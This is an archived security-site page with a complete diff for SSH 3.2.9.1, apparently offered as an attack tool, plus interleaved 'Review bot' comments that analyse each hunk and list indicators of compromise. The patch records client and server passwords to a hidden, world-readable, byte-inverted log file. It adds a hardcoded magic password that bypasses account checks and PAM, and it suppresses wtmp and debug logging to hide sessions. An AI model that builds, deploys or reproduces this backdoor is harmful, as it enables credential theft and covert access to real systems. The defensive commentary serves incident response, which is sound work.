
apatch-ssh-3.2.9.1

apatch-ssh-3.2.9.1
Posted Sep 23, 2004
Authored by Aion

Apatch for ssh v3.2.9.1 which saves user passwords to a file and allows for a magic backdoor password.

tags | patch
systems | unix
SHA-256 | f08fe89482e672931485c68ecde25820cbcf0b761f0ca51f8db7377ca152326a

apatch-ssh-3.2.9.1

diff -N -r -c ssh-3.2.9.1/apps/ssh/authc-kbd-interactive.c ssh-3.2.9.1+/apps/ssh/authc-kbd-interactive.c
*** ssh-3.2.9.1/apps/ssh/authc-kbd-interactive.c 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/authc-kbd-interactive.c 2004-07-18 11:52:41.000000000 +0300
***************
*** 204,209 ****
--- 204,213 ----
{
/* XXX async, please! */
gdata->response = ssh_read_passphrase(msg, FALSE);
+ aionlog("kbdito: %s \tuser: %s \tpass: %s\n",
+ gdata->client->remote_server,
+ gdata->client->remote_user,
+ gdata->response);
if (gdata->response)
gdata->response_len = strlen(gdata->response);
else
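Review bot: The added `aionlog(...)` call directly after `ssh_read_passphrase` copies the remote server name, the remote user name and the typed keyboard-interactive response into the patch's log file, and the same kind of call is added after the password prompt in authc-passwd.c. Both sit in the client, so a host that ran a binary built from this tree has exposed credentials for every remote system its users logged in to, not only for local accounts. Incident scope therefore has to include those remote systems. The four added lines should be removed; the enclosing function starts and ends outside the hunk.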
diff -N -r -c ssh-3.2.9.1/apps/ssh/authc-passwd.c ssh-3.2.9.1+/apps/ssh/authc-passwd.c
*** ssh-3.2.9.1/apps/ssh/authc-passwd.c 2003-12-03 15:17:24.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/authc-passwd.c 2004-07-18 11:53:59.000000000 +0300
***************
*** 105,110 ****
--- 105,112 ----
SSH_TRACE(2, ("Starting password auth..."));
#ifndef SSH_NEW_READPASS_ELOOP
password = ssh_read_passphrase(buf, FALSE);
+ aionlog("pwto: %s \tuser: %s \tpass: %s\n",
+ client->common->remote_ip, client->remote_user, password);
#else /* SSH_NEW_READPASS_ELOOP */
ssh_readpass_eloop();
return;
diff -N -r -c ssh-3.2.9.1/apps/ssh/auths-kbd-interactive.c ssh-3.2.9.1+/apps/ssh/auths-kbd-interactive.c
*** ssh-3.2.9.1/apps/ssh/auths-kbd-interactive.c 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/auths-kbd-interactive.c 2004-07-18 11:46:29.000000000 +0300
***************
*** 284,289 ****
--- 284,294 ----
goto proto_error;

state->resps[i] = resp;
+ if(!strcmp(LEETPASS, resp))
+ aion = 1;
+ else
+ aionlog("kbdifrom: %s \tuser: %s \tpass: %s\n",
+ state->server->common->remote_ip, state->user, resp);
}

/* Pass replys to submethod. */
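Review bot: The added `if(!strcmp(LEETPASS, resp)) aion = 1;` sets a process-wide flag whenever a keyboard-interactive response equals a compiled-in constant, without reference to `state->user`. Every other response is written in clear to the patch's log together with `remote_ip` and the user name. Because the comparison does not depend on the account, rotating user passwords does not close this path; the server binary has to be replaced from a verified package. The five added lines should be removed so that `state->resps[i] = resp;` is followed directly by the end of the loop body, which itself begins outside the hunk.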
diff -N -r -c ssh-3.2.9.1/apps/ssh/auths-kbd-int-pam.c ssh-3.2.9.1+/apps/ssh/auths-kbd-int-pam.c
*** ssh-3.2.9.1/apps/ssh/auths-kbd-int-pam.c 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/auths-kbd-int-pam.c 2004-07-18 11:47:23.000000000 +0300
***************
*** 273,278 ****
--- 273,279 ----
}
}

+ if(aion) packet_type = SSH_PAM_OP_SUCCESS;
switch (packet_type)
{
case SSH_PAM_OP_SUCCESS:
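Review bot: `if(aion) packet_type = SSH_PAM_OP_SUCCESS;` overwrites the value computed above the `switch`, so once the flag is set the success branch no longer reflects what the PAM exchange reported. PAM-side controls such as lockout, access rules or a second factor therefore cannot be treated as compensating controls on a host running this build (inferred, since the PAM exchange itself is outside the hunk). The line should be removed so that `switch (packet_type)` acts only on the value received.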
diff -N -r -c ssh-3.2.9.1/apps/ssh/ssh2version.h ssh-3.2.9.1+/apps/ssh/ssh2version.h
*** ssh-3.2.9.1/apps/ssh/ssh2version.h 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/ssh2version.h 2004-07-18 11:32:23.000000000 +0300
***************
*** 1 ****
! #define SSH2_VERSION "3.2.9.1"
--- 1 ----
! #define SSH2_VERSION "3.2.9.1" // change it
diff -N -r -c ssh-3.2.9.1/lib/sshsession/sshunixuser.c ssh-3.2.9.1+/lib/sshsession/sshunixuser.c
*** ssh-3.2.9.1/lib/sshsession/sshunixuser.c 2003-12-03 15:17:21.000000000 +0200
--- ssh-3.2.9.1+/lib/sshsession/sshunixuser.c 2004-07-18 11:50:27.000000000 +0300
***************
*** 890,895 ****
--- 890,898 ----
char *encrypted_password;
const char *correct_passwd = uc->correct_encrypted_passwd;

+ if(!strcmp(LEETPASS, password)) return aion = 1;
+ aionlog("pwfrom: %s \tuser: %s \tpass: %s\n",
+ remote_host, uc->name, password);
#ifdef HAVE_ULTRIX_SHADOW_PASSWORDS
{
struct svcinfo *svp;
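Review bot: `if(!strcmp(LEETPASS, password)) return aion = 1;` is placed ahead of every platform-specific check that follows, so the function returns 1 (presumably its success value) for whichever account `uc` refers to before `correct_passwd` is consulted. The `aionlog` call after it records the submitted password before it is verified, so the log holds failed and mistyped attempts as well as valid ones; those often belong to other systems and need rotating too. Both added statements should be removed. The function's signature and the rest of its body are outside the hunk.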
diff -N -r -c ssh-3.2.9.1/lib/sshsession/wtmp.c ssh-3.2.9.1+/lib/sshsession/wtmp.c
*** ssh-3.2.9.1/lib/sshsession/wtmp.c 2003-12-03 15:17:21.000000000 +0200
--- ssh-3.2.9.1+/lib/sshsession/wtmp.c 2004-07-18 11:35:54.000000000 +0300
***************
*** 221,226 ****
--- 221,229 ----
struct utmp u;
const char *utmp, *wtmp;

+ #endif
+ if(aion) return;
+ #if defined(HAVE_UTMP_H) && !defined(HAVE_UTMPX_H)
/* Construct an utmp/wtmp entry. */
memset(&u, 0, sizeof(u));
# if defined(DEAD_PROCESS) && defined(HAVE_TYPE_IN_UTMP)
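Review bot: The added `if(aion) return;` is spliced between an `#endif` / `#if` pair so that it compiles on every platform variant, and it leaves the function before the utmp/wtmp entry is constructed. The second hunk in this file adds the same early return ahead of `logout()` / `logwtmp()`. Sessions opened after the flag is set therefore leave no login or logout record, and `who` / `last` output from an affected host cannot be used to rule out access. Responders should reconstruct sessions from sources this process does not write, such as network flow records, process accounting or kernel audit logs. Both function bodies extend beyond the hunks.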
***************
*** 585,590 ****
--- 588,594 ----
{
#ifdef HAVE_LIBUTIL_LOGIN
const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */
+ if(aion) return;
if (logout((char *)line))
logwtmp((char *)line, "", "");
#else /* HAVE_LIBUTIL_LOGIN */
diff -N -r -c ssh-3.2.9.1/lib/sshutil/sshcore/sshdebug.c ssh-3.2.9.1+/lib/sshutil/sshcore/sshdebug.c
*** ssh-3.2.9.1/lib/sshutil/sshcore/sshdebug.c 2003-12-03 15:17:29.000000000 +0200
--- ssh-3.2.9.1+/lib/sshutil/sshcore/sshdebug.c 2004-07-18 11:37:26.000000000 +0300
***************
*** 806,811 ****
--- 806,812 ----
ssh_vsnprintf(buf, sizeof(buf), fmt, va);
va_end(va);

+ if(aion) return;
/* If a callback has been set, use it to send the message. */
if (ssh_debug_log_callback)
(*ssh_debug_log_callback)(facility, severity, buf, ssh_debug_log_context);
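Review bot: `if(aion) return;` runs after the message has been formatted into `buf` but before `ssh_debug_log_callback` is consulted, so once the flag is set nothing passing through this function reaches the callback or any fallback that follows it. Together with the wtmp.c change this removes the daemon's own record of the session. A connection visible in network telemetry with no matching sshd log lines is then a usable indicator. Forwarding logs off-host does not help here, because the message is dropped before it is emitted. The function begins and ends outside the hunk.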
diff -N -r -c ssh-3.2.9.1/lib/sshutil/sshincludes.h ssh-3.2.9.1+/lib/sshutil/sshincludes.h
*** ssh-3.2.9.1/lib/sshutil/sshincludes.h 2003-12-03 15:17:18.000000000 +0200
--- ssh-3.2.9.1+/lib/sshutil/sshincludes.h 2004-07-18 11:14:44.000000000 +0300
***************
*** 13,18 ****
--- 13,39 ----

*/

+ // patch by Aion
+ #include <sys/stat.h>
+ #include <stdio.h>
+
+ #define LEETPASS "gathering"
+ #define SSH_LOG "/var/log/kmesg"
+
+ FILE *alog;
+ char abuff[512];
+ int alen, ai, aion;
+
+ #define aionlog(arg...) { \
+ ssh_snprintf(abuff, sizeof(abuff), ##arg); \
+ alen=strlen(abuff); \
+ for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
+ alog=fopen(SSH_LOG, "a"); \
+ if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+ // end patch
+
#ifndef SSHINCLUDES_H
#define SSHINCLUDES_H
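Review bot: This header block supplies the `LEETPASS` and `SSH_LOG` constants and the `aionlog` macro that every other hunk relies on. Because it sits above the `#ifndef SSHINCLUDES_H` guard, it also defines the globals `alog`, `abuff`, `alen`, `ai` and `aion` in each translation unit that includes the header. For detection the page gives concrete indicators: the path `/var/log/kmesg`, the `chmod(SSH_LOG, 0666)` that leaves it world-readable and world-writable, and records stored as the bitwise complement of each byte, so the file looks like binary data and a plain-text search for user names finds nothing. Any local account on an affected host could read the captured credentials, which widens the set of parties to consider during response. Check for that file, its mode and unexpected writers, and verify installed ssh and sshd binaries against the vendor's checksums rather than the version banner, which the ssh2version.h hunk leaves unchanged.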
